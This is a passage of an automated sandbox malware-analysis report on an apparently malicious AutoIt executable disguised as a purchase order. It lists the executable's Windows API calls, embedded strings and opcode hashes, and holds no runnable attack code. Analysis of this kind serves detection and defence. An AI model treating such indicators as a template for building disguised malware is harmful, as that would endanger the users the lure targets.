                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                    • API String ID: 3938964917-2362283451
                                                    • Opcode ID: 5ebbe66f3e0218c8eacee258e06410c6afd984c8e6716a22a3b27948c3320cb7
                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                    • Opcode Fuzzy Hash: 5ebbe66f3e0218c8eacee258e06410c6afd984c8e6716a22a3b27948c3320cb7
                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Error:
                                                    • API String ID: 4104443479-232661952
                                                    • Opcode ID: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                    • Opcode Fuzzy Hash: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,0040F545,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,004A90E8,C:\Users\user\Desktop\[Purchase Order] PO2411024.exe,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                    • String ID: X$pWH
                                                    • API String ID: 85490731-941433119
                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                    • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                    Strings
                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                    • C:\Users\user\Desktop\[Purchase Order] PO2411024.exe, xrefs: 00410107
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\[Purchase Order] PO2411024.exe
                                                    • API String ID: 1765576173-1136133190
                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                    • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                    • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                    • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1794320848-0
                                                    • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                    • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                    • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                    • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                    • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                    • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                      • Part of subcall function 00403B70: _memmove.LIBCMT ref: 00403BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$_malloc_memmove
                                                    • String ID: \5@
                                                    • API String ID: 961785871-1309314528
                                                    • Opcode ID: 0caf7c4cd6c7281c1b21bfb376f2373c41260c12b78a270c3d28372c06a18be1
                                                    • Instruction ID: cad64edcdcba5d9ec8cd2b6a335bbe98b4fe19d5968b0e5b1ca7a0aa7405deab
                                                    • Opcode Fuzzy Hash: 0caf7c4cd6c7281c1b21bfb376f2373c41260c12b78a270c3d28372c06a18be1
                                                    • Instruction Fuzzy Hash: 7801D6713402007FE714AB669C86F6B7B9CDB85725F14403ABA09DB2D1D9B1ED008365
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0043214B
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _malloc.LIBCMT ref: 0043215D
                                                    • _malloc.LIBCMT ref: 0043216F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _malloc$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 680241177-0
                                                    • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                    • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                    • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                                    • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                    APIs
                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchPeekTranslate
                                                    • String ID:
                                                    • API String ID: 4217535847-0
                                                    • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                    • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                    • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                    • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                    • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                    • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                    • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                    • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                    APIs
                                                    • _free.LIBCMT ref: 0043210A
                                                      • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                      • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                    • _free.LIBCMT ref: 0043211D
                                                    • _free.LIBCMT ref: 00432130
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                    • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                    • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                    • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                    • String ID:
                                                    • API String ID: 4163294574-0
                                                    • Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                    • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                    • Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                    • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                    APIs
                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                    • _strcat.LIBCMT ref: 0040F786
                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                    • String ID:
                                                    • API String ID: 3199840319-0
                                                    • Opcode ID: 1ce8d8ec4429337c60193f8b2422588a912adf836a7dc8a25abf522012a1f6f4
                                                    • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                    • Opcode Fuzzy Hash: 1ce8d8ec4429337c60193f8b2422588a912adf836a7dc8a25abf522012a1f6f4
                                                    • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
